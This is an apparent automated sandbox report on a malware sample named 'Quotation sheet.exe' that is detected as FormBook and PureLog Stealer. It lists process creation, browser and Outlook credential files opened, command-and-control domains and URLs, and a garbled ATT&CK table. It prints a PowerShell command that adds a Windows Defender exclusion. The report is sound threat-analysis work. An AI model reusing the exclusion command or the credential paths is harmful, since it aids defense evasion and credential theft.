                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quotation sheet.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: UsMxwwTDRUHSSD.exe, 00000008.00000002.3972572404.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000000.2363065025.00000000019E0000.00000002.00000001.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3972853012.0000000001110000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Quotation sheet.exeQueries volume information: C:\Users\user\Desktop\Quotation sheet.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Quotation sheet.exe.5c50000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation sheet.exe.5c50000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation sheet.exe.4379970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.3971619901.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440846856.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2440078070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973205147.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3973090704.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3973266974.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3973027179.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2448995977.0000000006B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Quotation sheet.exe.5c50000.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation sheet.exe.5c50000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Quotation sheet.exe.4379970.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2354177736.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2346401680.0000000004379000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		612
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook612
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562984 Sample: Quotation sheet.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 37 www.rtpterbaruwaktu3.xyz 2->37 39 rtpterbaruwaktu3.xyz 2->39 41 10 other IPs or domains 2->41 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected PureLog Stealer 2->53 57 9 other signatures 2->57 10 Quotation sheet.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\...\Quotation sheet.exe.log, ASCII 10->35 dropped 69 Writes to foreign memory regions 10->69 71 Allocates memory in foreign processes 10->71 73 Adds a directory exclusion to Windows Defender 10->73 75 Injects a PE file into a foreign processes 10->75 14 vbc.exe 10->14         started        17 powershell.exe 23 10->17         started        19 vbc.exe 10->19         started        signatures6 process7 signatures8 77 Maps a DLL or memory area into another process 14->77 21 UsMxwwTDRUHSSD.exe 14->21 injected 79 Loading BitLocker PowerShell Module 17->79 24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 21->59 26 pcaui.exe 13 21->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 UsMxwwTDRUHSSD.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 rtpterbaruwaktu3.xyz 103.21.221.87, 49805, 80 LINKNET-ID-APLinknetASNID unknown 29->43 45 www.ytsd88.top 47.76.213.197, 50000, 50006, 50008 VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States 29->45 47 7 other IPs or domains 29->47 81 Found direct / indirect Syscall (likely to bypass EDR) 29->81 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Quotation sheet.exe42%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                      Quotation sheet.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.rtpterbaruwaktu3.xyz/7yx4/?4nJt=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQfxXg8RiZPfSfo9OGQETOHlofaWbM+4fubyGFlkwZbqaQYg0Zq5k=&pXIDi=30N834GpBZU0OT0%Avira URL Cloudsafe
                      http://www.smartcongress.net/11t3/0%Avira URL Cloudsafe
                      http://www.matteicapital.online/Capital_Investment_Advisors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEh0%Avira URL Cloudsafe
                      http://www.llljjjiii.shop/rsvy/0%Avira URL Cloudsafe
                      http://www.mrpokrovskii.pro/2pji/0%Avira URL Cloudsafe
                      http://www.70kdd.top/klhq/0%Avira URL Cloudsafe
                      http://www.ampsamkok88.shop0%Avira URL Cloudsafe
                      http://www.ytsd88.top/egqi/?4nJt=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8hsZr969MltuXdWdWoGPR3ZZyiGe82JgugZANkAzsKk95fWmtipo=&pXIDi=30N834GpBZU0OT0%Avira URL Cloudsafe
                      http://www.acond-22-mvr.click/w9z4/100%Avira URL Cloudmalware
                      http://www.smartcongress.net/11t3/?4nJt=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL01304IHNwj2Yod4wHZbXR5gNDbNQ3/FaK5QMq4IALVNsxgTOJYQtE8=&pXIDi=30N834GpBZU0OT0%Avira URL Cloudsafe
                      http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikO0%Avira URL Cloudsafe
                      http://www.ampsamkok88.shop/huvt/?pXIDi=30N834GpBZU0OT&4nJt=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPYmXYZehu45VPp8MOy5WAu5nHK8ZcCMaFZ8i121M6teoDlc6/N3I=0%Avira URL Cloudsafe
                      http://www.acond-22-mvr.click/w9z4/?pXIDi=30N834GpBZU0OT&4nJt=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfeeeHGBayQssFEBpobh2/IGMpij3nRh8aV/8PsprR6rwOHUxE7sI=100%Avira URL Cloudmalware
                      http://www.matteicapital.online/hyyd/?pXIDi=30N834GpBZU0OT&4nJt=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qXzRX0Cz+jRSrIUTHSjZKbFGxkH1PP6E18JoqtQ6kBAoCTLA5p2fs=0%Avira URL Cloudsafe
                      http://www.ampsamkok88.shop/huvt/0%Avira URL Cloudsafe
                      http://www.matteicapital.online/Working_Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S0%Avira URL Cloudsafe
                      https://www.trtworld.com/#frmActiveBrowsers0%Avira URL Cloudsafe
                      http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns0%Avira URL Cloudsafe
                      http://www.mrpokrovskii.pro/2pji/?4nJt=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT4yZs3PgO7inQ/GZvdPSYtqhraoLnL30EVGtCNPTPRdM0+5LARJM=&pXIDi=30N834GpBZU0OT0%Avira URL Cloudsafe
                      http://www.70kdd.top/klhq/?4nJt=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+neDAiWkCkYZ57L047aTN0FvloZtiL1GHORQkvVBkncoqs6arxlw=&pXIDi=30N834GpBZU0OT0%Avira URL Cloudsafe
                      http://www.matteicapital.online/Raising_Capital_for_Business.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WE0%Avira URL Cloudsafe
                      http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSikOF0%Avira URL Cloudsafe
                      http://www.ytsd88.top/egqi/0%Avira URL Cloudsafe
                      http://www.llljjjiii.shop/rsvy/?4nJt=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rUtvmrzoHlx2y6yO58LrdYrj1cF4c73Y/2t0betNNlPaD+UeVatM=&pXIDi=30N834GpBZU0OT0%Avira URL Cloudsafe
                      http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online0%Avira URL Cloudsafe
                      http://www.Matteicapital.online0%Avira URL Cloudsafe
                      http://www.matteicapital.online/hyyd/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.llljjjiii.shop
                      		8.210.114.150
                      		truefalse
                        		unknown
                        www.ampsamkok88.shop
                        		172.67.209.48
                        		truefalse
                          		unknown
                          www.acond-22-mvr.click
                          		199.59.243.227
                          		truefalse
                            		unknown
                            www.mrpokrovskii.pro
                            		194.85.61.76
                            		truefalse
                              		high
                              smartcongress.net
                              		146.88.233.115
                              		truefalse
                                		unknown
                                www.matteicapital.online
                                		208.91.197.27
                                		truefalse
                                  		unknown
                                  70kdd.top
                                  		38.47.232.124
                                  		truefalse
                                    		unknown
                                    www.ytsd88.top
                                    		47.76.213.197
                                    		truefalse
                                      		high
                                      rtpterbaruwaktu3.xyz
                                      		103.21.221.87
                                      		truetrue
                                        		unknown
                                        www.70kdd.top
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.rtpterbaruwaktu3.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.smartcongress.net
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.smartcongress.net/11t3/false
                                              • Avira URL Cloud: safe
                                              		unknown
